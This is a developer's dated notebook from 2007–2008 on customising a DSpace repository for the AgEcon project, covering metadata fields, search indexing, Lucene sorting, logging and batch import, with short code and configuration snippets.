The file choose-file.jsp had to be modified:

<%--
<p class="submitFormHelp"><strong>Netscape users please note:</strong> By default, the window brought up by clicking "Browse..." will only display files of type HTML. If the file you are uploading isn't an HTML file, you will need to select the option to display files of other types. <object><dspace:popup page="/help/index.html#netscapeupload">Instructions for Netscape users</dspace:popup></object> are available.</p>
--%>
<%-- Louise Letnes and Julia Kelly wanted these messages deleted from the top of the upload page
<div class="submitFormHelp"><fmt:message key="jsp.submit.choose-file.info3"/> <dspace:popup page="/help/index.html#netscapeupload"><fmt:message key="jsp.submit.choose-file.info4"/></dspace:popup></div>
--%>
<%-- FIXME: Collection-specific stuff should go here? --%>
<%--
<p class="submitFormHelp">Please also note that the DSpace system is able to preserve the content of certain types of files better than other types. <object><dspace:popup page="/help/formats.jsp">Information about file types</dspace:popup></object> and levels of support for each are available.</p>
--%>
<%--
<div class="submitFormHelp"><fmt:message key="jsp.submit.choose-file.info6"/> <dspace:popup page="/help/formats.jsp"><fmt:message key="jsp.submit.choose-file.info7"/></dspace:popup> </div>
--%>

January 7, 2008

Changes to AGEcon Submit -- First Set of Changes

I) Fields to add

1) Items to modify

Here are all the metadata for the agecon project. The items labeled must be added to the submit form.
These items are:
A) hasEndPage
B) hasStartPage
C) ispartofname
D) ispartofnumber
E) ispartoftitle
F) ispartofvolume

B) Changes to the java code

Needed to modify the code shown below from the Item.java class:

public DCValue[] getDC(String element, String qualifier, String lang)
{
    DCValue[] MetaData = getMetadata(MetadataSchema.DC_SCHEMA, element, qualifier, lang);
    // Fall back to the agecon schema when the dc schema has no value
    if (MetaData.length == 0)
        MetaData = getMetadata("agecon", element, qualifier, lang);
    // return getMetadata(MetadataSchema.DC_SCHEMA, element, qualifier, lang);
    return MetaData;
}

This allows the software to recognize both agecon and dc elements, so the items will appear in the verify step.

2) Making changes so that new items appear in search

A) In the file /config/dspace.cfg add lines to webui.itemdisplay.default so that it has the form below:

webui.itemdisplay.default = dc.title, dc.title.alternative, \
    dc.contributor.author, \
    agecon.contributor.authorContact, \
    dc.contributor.editor, \
    agecon.contributor.editorContact, \
    dc.subject, dc.date.issued(date), \
    dc.relation.ispartofseries, \
    dc.description.abstract, \
    dc.description, \
    agecon.relation.ispartoftitle, \
    agecon.relation.ispartofnumber, \
    agecon.relation.ispartofvolume, \
    agecon.relation.ispartofname, \
    agecon.format.hasStartPage, \
    agecon.format.hasEndPage, \
    dc.format.extent, \
    dc.relation

B) In the file config/language-packs/Messages.properties add:

metadata.agecon.relation.ispartoftitle = Journal Title
metadata.agecon.relation.ispartofnumber = Journal Number
metadata.agecon.relation.ispartofvolume = Journal Volume
metadata.agecon.relation.ispartofname = Journal Issue
metadata.agecon.format.hasStartPage = From Page
metadata.agecon.format.hasEndPage = To Page

All the new items are now visible in the dspace search.

II) Move License to the front

In the file item-submission.xml create a new Submission Process with the license first. Make this submission process the default.

III) Combine two description pages

By eliminating the xml below (in the file input-forms.xml), I was able to combine two of the description pages:

</page> <page number="2">

January 2, 2008

Possible ant builds for dspace

ant compile
ant build_wars
ant update
ant install_code
ant init_configs
ant setup_database
ant clean_database
ant load_registries
ant fresh_install
ant clean
ant public_api
ant javadoc

December 4, 2007

Location of pdfs after dspace submit

After the dspace submit process, the pdfs are sent to the directory:

/usr/local/dspace-sr-dev/assetstore

and are given cryptic names like:

/usr/local/dspace-sr-dev/assetstore/97/93/57/97935760829952567360200962040412392397


97935760829952567360200962040412392397 is a pdf file.
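
The directory names are not random: in the example above they are the first three pairs of digits of the file name. The sketch below derives the path on that assumption (three levels of two digits each, read off the single example here, not checked against the DSpace source); the function name is made up.

```python
import posixpath


def asset_path(assetstore: str, internal_id: str, levels: int = 3, digits: int = 2) -> str:
    """Derive the on-disk path of a bitstream from its internal id."""
    # Each directory level is the next `digits` characters of the id.
    parts = [internal_id[i * digits:(i + 1) * digits] for i in range(levels)]
    return posixpath.join(assetstore, *parts, internal_id)


print(asset_path("/usr/local/dspace-sr-dev/assetstore",
                 "97935760829952567360200962040412392397"))
```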

files modified for sort (final ingest into UDC)

Last week I did an svn commit to update UDC so that it would sort.
Here are the files that were modified:
M config/dspace.cfg
M src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
M src/org/dspace/search/DSQuery.java
M src/edu/umn/dspace/app/webui/jsptag/ItemListTag.java
M jsp/local/browse/items-by-date.jsp
M jsp/local/browse/items-by-subject.jsp
M jsp/local/browse/items-by-title.jsp
M jsp/local/browse/items-by-author.jsp
M jsp/local/search/results.jsp
M jsp/layout/location-bar.jsp

The two files below were modified during an earlier ingest:
src/org/dspace/search/DSIndexer.java
src/org/dspace/search/QueryArgs.java

see note of November 07, 2007

November 30, 2007

create-administrator ... makes an admin user in dspace

This command line function steps you through creating an admin user in dspace

location:
/usr/local/dspace-sr-dev/bin/create-administrator


I had to make changes to the script documented below:
###########################################################################
# Shell script creating a starting administrator account

# Get the DSPACE/bin directory
BINDIR=`dirname $0`

#*****************************************************************
# Within the dspace.jar for Agecon there was no class called:
#    edu.umn.dspace.administer.CreateAdministrator
# however I found a class called:
#    org/dspace/administer/CreateAdministrator
# I used that jar and this script worked properly
#
#
#$BINDIR/dsrun edu.umn.dspace.administer.CreateAdministrator
#
# J Silvis
# 29 Nov 2007
#*****************************************************************
$BINDIR/dsrun org/dspace/administer/CreateAdministrator

November 7, 2007

Files changed to make ag econ sort

The files below were changed to make ag econ sort, by clicking the headers of the tables.
SR/trunk/config/dspace.cfg
SR/trunk/jsp/local/search/results.jsp
SR/trunk/src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
SR/trunk/src/org/dspace/search/DSIndexer.java
SR/trunk/src/org/dspace/search/DSQuery.java
SR/trunk/src/org/dspace/search/QueryArgs.java
SR/trunk/src/edu/umn/dspace/app/webui/jsptag/ItemListTag.java

This is R 57 in the SVN Repository

October 30, 2007

Adding a new field to the dspace database

In the file ./config/dspace.cfg one finds:

search.index.1 = author:dc.contributor.*

search.index.2 = author:dc.creator.*

search.index.3 = title:dc.title.*

search.index.4 = keyword:dc.subject.*

search.index.5 = abstract:dc.description.abstract

search.index.6 = author:dc.description.statementofresponsibility

search.index.7 = series:dc.relation.ispartofseries

search.index.8 = abstract:dc.description.tableofcontents

search.index.9 = mime:dc.format.mimetype

search.index.10 = sponsor:dc.description.sponsorship

search.index.11 = identifier:dc.identifier.*

search.index.12 = language:dc.language.iso

search.index.13 = date:dc.date.issued

I added the line that is bolded.

After this line is added you must run:

ant init_configs -- update the config system

ant install_code -- compile the indexer code

And then the script below to reindex lucene:

/usr/local/dspace-sr-dev/bin/index-all
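
Each search.index line maps a lucene index name to a metadata field written as schema.element.qualifier. The sketch below splits one such line into its parts; it is only an illustration of the line format shown above, and the function name is made up.

```python
def parse_search_index(line: str) -> dict:
    """Split 'search.index.N = name:schema.element[.qualifier]' into parts."""
    key, _, value = line.partition("=")
    number = int(key.strip().rsplit(".", 1)[1])
    index_name, _, field = value.strip().partition(":")
    schema, element, *rest = field.split(".")
    return {
        "number": number,
        "index": index_name,
        "schema": schema,
        "element": element,
        # "*" means any qualifier; None means the line gave no qualifier.
        "qualifier": rest[0] if rest else None,
    }


print(parse_search_index("search.index.13 = date:dc.date.issued"))
```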


October 22, 2007

Report to John and Brad about dspace progress

John & Brad,
Below is what I have done the last few days with dspace.
Jeff


Attempt to use lucene to sort fields:
1) Examined work by Rooma who attempted to solve the problem.
2) She tried to use the lucene engine to sort the fields -> I tested lucene sort.
3) lucene will not sort tokenized fields.
4) Requests have been sent to lucene and dspace to create sortable tokenized fields. There seems to be some internal debate as to whether this is wise/possible.
5) Used lucene 2.2 jar to dump all attributes of fields stored in our lucene DB (we are using the 2.0 jar which does not have this feature and I will return to the original jar).
6) The "isTokenized" attribute has the value “true” for all the fields except the field named “handle”.
7) In its current state, none of the fields of interest are sortable by lucene.

Unique problem of date field:
1) “date” field is not stored in lucene.
2) Likely generated in the jsp for the 10 records that are displayed.
3) derived from direct call to sql db?

My plans:
1) I talked to Bill and he says there is a way to index a field twice, as both tokenized and non-tokenized. I will explore this idea to make our fields sortable.
2) Brad and I have discussed the "date problem". Could go directly to sql or fix lucene.

Gains:
1) The lucene 2.2 jar allows me to peer into the lucene DB and display all the properties of the stored fields.
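
The idea of indexing a field twice can be shown with a toy index. This is plain Python and not the lucene API: each document keeps a tokenized copy of the title for searching and an untokenized copy (the hypothetical title_sort key) for sorting.

```python
def index_document(doc_id: int, title: str) -> dict:
    """Store a title twice: tokenized for search, whole for sorting."""
    return {
        "id": doc_id,
        # Tokenized copy: lower-cased terms, used for matching.
        "title": title.lower().split(),
        # Untokenized copy: the whole value kept as one term, used for sorting.
        "title_sort": title.lower(),
    }


def search(index: list, term: str, sort_field: str = "title_sort") -> list:
    """Return ids of documents whose title contains term, sorted by sort_field."""
    hits = [doc for doc in index if term.lower() in doc["title"]]
    return [doc["id"] for doc in sorted(hits, key=lambda doc: doc[sort_field])]


index = [
    index_document(1, "Urban water use"),
    index_document(2, "Rural and urban markets"),
    index_document(3, "Farm income"),
]
print(search(index, "urban"))
```

The tokenized copy alone cannot give this ordering, because once the title is split into terms there is no single value left to compare.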

Aliases for servlets

From the ./etc/dspace-web.xml file:

<servlet>
  <servlet-name>subject-search</servlet-name>
  <servlet-class>org.dspace.app.webui.servlet.ControlledVocabularySearchServlet</servlet-class>
</servlet>
<servlet>
  <servlet-name>simple-search</servlet-name>
  <servlet-class>org.dspace.app.webui.servlet.SimpleSearchServlet</servlet-class>
</servlet>

Attributes of the fields in the Lucene database (in dspace) + sortable problem

I used the code below:

JavaCodeToDumpLuceneAttributes.html

and found out that the fields in the lucene DB had the following attributes:

dspaceFields.html

Fields cannot be tokenized if they are to be sortable. So none of the fields other than the handle are sortable.

October 17, 2007

Get logger running for dspace

1) stop tomcat



2) fix log level in dspace config file: dspace.cfg

config.template.log4j.properties = ${dspace.dir}/config/log4j.properties

config.template.log4j-handle-plugin.properties = ${dspace.dir}/config/log4j-handle-plugin.properties

config.template.oaicat.properties = ${dspace.dir}/config/oaicat.properties



3) run init_configs ant task



4) make new war files

5) tomcat config file:

$CATALINA_HOME/conf/logging.properties contains

java.util.logging.ConsoleHandler.level = FINE

java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter

6) Start tomcat

October 15, 2007

Classes in dspace that touch LUCENE

All Classes that contain Lucene are in the
package org.dspace.search


Input:
./src/org/dspace/search/DSAnalyzer.java -> ./src/org/dspace/search/DSIndexer.java

Query
./src/org/dspace/search/DSTokenizer.java -> ./src/org/dspace/search/DSQuery.java

--------------------------------------------------------------------------------------------

DSIndexer is used by several classes
jgrep -l DSIndexer
./src/org/dspace/app/mediafilter/MediaFilterManager.java
./src/org/dspace/app/webui/servlet/admin/EditItemServlet.java
./src/org/dspace/content/Collection.java
./src/org/dspace/content/Community.java
./src/org/dspace/content/InstallItem.java
./src/org/dspace/content/Item.java
./src/org/dspace/search/DSIndexer.java
./src/org/dspace/search/DSQuery.java


DSQuery is used by several classes
jgrep -l DSQuery
./src/org/dspace/app/webui/servlet/ControlledVocabularySearchServlet.java
./src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
./src/org/dspace/search/DSQuery.java


Other classes found in org.dspace.search
./src/org/dspace/search/Harvest.java
./src/org/dspace/search/HarvestedItemInfo.java
./src/org/dspace/search/QueryArgs.java
./src/org/dspace/search/QueryResults.java

October 12, 2007

Data files for dspace

Location in Odin to svn source files

Get data files from odin and load them into the database

scp -r silvi003@odin.lib.umn.edu:/mnt/agecon_export/dc_mixed_nodata .


Loading the files used the command:
./dsrun edu.umn.dspace.administer.BatchImporter -R -a -e silvi003@umn.edu -s /Users/silvi003/dc_mixed_data/dc_mixed_nodata


I tried to change the code:

In the DSIndexer class, setting
wipe_existing = true;
(it is usually false) allowed the program to run much longer.

Now it dies with:

Exception in thread "main" java.sql.SQLException: bad_dublin_core SchemaID=1, contributor author_contact
at org.dspace.content.Item.update(Item.java:1468)
at org.dspace.content.InstallItem.installItem(InstallItem.java:146)
at edu.umn.dspace.administer.BatchImporter.addItem(BatchImporter.java:670)
at edu.umn.dspace.administer.BatchImporter.addItems(BatchImporter.java:557)
at edu.umn.dspace.administer.BatchImporter.createCommunityStructure(BatchImporter.java:430)
at edu.umn.dspace.administer.BatchImporter.createCommunityStructure(BatchImporter.java:500)
at edu.umn.dspace.administer.BatchImporter.main(BatchImporter.java:267)

log:

2007-10-09 10:12:51,407 WARN org.dspace.content.Item @ silvi003@umn.edu::bad_dc:Bad DC field.
SchemaID=1, element: "contributor" qualifier: "author_contact" value: "Paterson,
Anna (anna@areu.org.af)"

Brad was able to edit the files and get some of the data to load. The word "urban" produced a useful search.
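
The failure above comes from a dublin_core.xml that uses an element/qualifier pair (contributor / author_contact) that is not registered for the dc schema. A pre-check along the lines below could catch such fields before the import runs. It assumes the usual dcvalue layout of the export files, and the registered set here is a made-up stand-in for what the metadata registry really holds.

```python
import xml.etree.ElementTree as ET


def unregistered_fields(dublin_core_xml: str, registered: set) -> list:
    """Return (element, qualifier) pairs in the XML that are not registered."""
    root = ET.fromstring(dublin_core_xml)
    bad = []
    for dcvalue in root.iter("dcvalue"):
        element = dcvalue.get("element")
        qualifier = dcvalue.get("qualifier") or "none"
        if (element, qualifier) not in registered:
            bad.append((element, qualifier))
    return bad


# Hypothetical registry contents and sample file, for illustration only.
REGISTERED = {("title", "none"), ("contributor", "author")}
SAMPLE = """<dublin_core>
  <dcvalue element="title" qualifier="none">Sample title</dcvalue>
  <dcvalue element="contributor" qualifier="author_contact">Sample, Author (author@example.org)</dcvalue>
</dublin_core>"""

print(unregistered_fields(SAMPLE, REGISTERED))
```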

October 1, 2007

Things needed to set up dspace

- download eclipse
- eclipse svn plugin subclipse
- Tomcat
- postgress.jar
- config dspace.cfg files
- also see dspace.org
